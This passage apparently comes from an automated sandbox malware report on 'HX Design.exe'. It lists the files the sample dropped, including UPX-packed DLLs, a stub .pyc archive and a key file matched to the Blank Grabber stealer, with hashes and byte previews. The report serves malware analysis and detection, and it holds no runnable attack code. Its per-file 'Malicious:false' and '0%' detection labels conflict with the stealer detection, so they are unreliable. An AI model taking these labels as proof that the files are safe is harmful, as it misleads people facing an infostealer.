                                                                                                                                                                                                                                                    SHA-256:641BAE68119122101FCE6ABDA99BA8D486AAB14E2CF7C8707B922D312A3071C7
                                                                                                                                                                                                                                                    SHA-512:8A2DBC16C95C06C70AF18CBAF3F35928174F8B032FFFFEF08912A6C799272938C15FB3180E9F9E72B1B297C034B5D2EF2D5DAFEA1BCF811C430F9C962159A203
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...). .......p........................................................`.........................................@...p......P............@..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):40448
                                                                                                                                                                                                                                                    Entropy (8bit):7.866181642604712
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:kUwT2VQ73Aw//a2V33x/Wc6ZExQKdQNQiwwoTRHLRbuRgyhC6p2:jw6VQ7ww62lxcOBdQJlozbuRgy0
                                                                                                                                                                                                                                                    MD5:FFFA67EEA0CBA154E5D37D484732C1A5
                                                                                                                                                                                                                                                    SHA1:DA4D420D3EF574602ABAF645C87BE78FC2390780
                                                                                                                                                                                                                                                    SHA-256:328873BB1D98D8B539993AD1C9AD1804CD6942D1013202AA19267931F0C7994D
                                                                                                                                                                                                                                                    SHA-512:5EB591671E5EA490F32F60BE6E272ECF25DCBAB104273DEFCE7A3E6378A80B999A3B4471BE1EA2BB5BA19AAF782551E9E61C0EDB2550CD72CFC766AA35B50B79
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).............H.......................................p............`..........................................b..d....`.......`......................<c.......................................T..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1630488
                                                                                                                                                                                                                                                    Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                    MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                    SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                    SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                    SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):29968
                                                                                                                                                                                                                                                    Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                    MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                    SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                    SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                    SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):227096
                                                                                                                                                                                                                                                    Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                    MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                    SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                    SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                    SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):124470
                                                                                                                                                                                                                                                    Entropy (8bit):7.708415942805973
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:X92W4oftAXOl2Ve4mR40kcjYAscf0bv6GzDfQuctPlavRo0YTD0IuSp+C1ToDlhc:nfaeEVe4OYrAPEo0mDL9pTCTfh0
                                                                                                                                                                                                                                                    MD5:F792C9DD0632ACCF9BA30611192B13E9
                                                                                                                                                                                                                                                    SHA1:DCE9CDF5CC2810F0E53E655994BE3D8DF022A94C
                                                                                                                                                                                                                                                    SHA-256:E62DB4173A9DCD580DD7954D6263218B0A3339A5226BE4444548B56602ACD1F2
                                                                                                                                                                                                                                                    SHA-512:72D6CA75E24030B4B10A52C8D56A81BB99D2EB88D7833B84441A66B8F2EEF75A7F942797141B451ADD28C595114FA1E1EE75CC04ABF2D2FBBF231C60CDBEEE0B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:PK........zI.Y.J..............stub-o.pyc........h.dg.i.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1850640
                                                                                                                                                                                                                                                    Entropy (8bit):7.994061638516346
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
                                                                                                                                                                                                                                                    MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
                                                                                                                                                                                                                                                    SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
                                                                                                                                                                                                                                                    SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
                                                                                                                                                                                                                                                    SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):630736
                                                                                                                                                                                                                                                    Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                    MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                    SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                    SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                    SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                                                                    Entropy (8bit):4.503500478942566
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:Bn9cZRI5sx1jD0xfhYaEjicNH0uMOCvbRhjWh:B9cZRI+/jDifejicNUkCvdEh
                                                                                                                                                                                                                                                    MD5:9795F79DDB61AA29027F4D68496B379C
                                                                                                                                                                                                                                                    SHA1:2B28DB4D9AC8CFFBA73048444B1DF25346F4EF32
                                                                                                                                                                                                                                                    SHA-256:E63F3D6710097498085564DFC85ADD6ED4CF44238C33D20820D2426ABCEE4E31
                                                                                                                                                                                                                                                    SHA-512:E44FBBC02DA75D173C81BDFDA9B14102997609AF06FD50C51030430C3C80193DADB632592997361C79B0DFED50CCC0E1743C306A881401A1C78A6A7FACB45D4D
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:RAR registration data..Blank-c..Stealer License..UID=e7ae0ee11c8703113d95..64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf..afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407..3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287..15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83..55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc..e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d..b5915ff59f78103d48e0826658d72ba8813da4a649711057613203..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26384
                                                                                                                                                                                                                                                    Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                                                    MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                                                    SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                                                    SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                                                    SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):659216
                                                                                                                                                                                                                                                    Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                                    MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                                    SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                                    SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                                    SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1122768
                                                                                                                                                                                                                                                    Entropy (8bit):6.6466118295886165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
                                                                                                                                                                                                                                                    MD5:3B337C2D41069B0A1E43E30F891C3813
                                                                                                                                                                                                                                                    SHA1:EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
                                                                                                                                                                                                                                                    SHA-256:C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
                                                                                                                                                                                                                                                    SHA-512:FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:K..:K..:K..K..:K..;K..:KK..K..:KK.:J..:KK.9J..:KK.?J..:KK.>J.:KK.4J..:KK..K..:KK.8J..:KRich..:K........PE..d................" .....0..........0^...............................................N....`A................................................................. ...........!...... .......p............................Z..8..............(............................text...X .......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata....... ......................@..@.rsrc...............................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):267024
                                                                                                                                                                                                                                                    Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                                    MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                                    SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                                    SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                                    SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
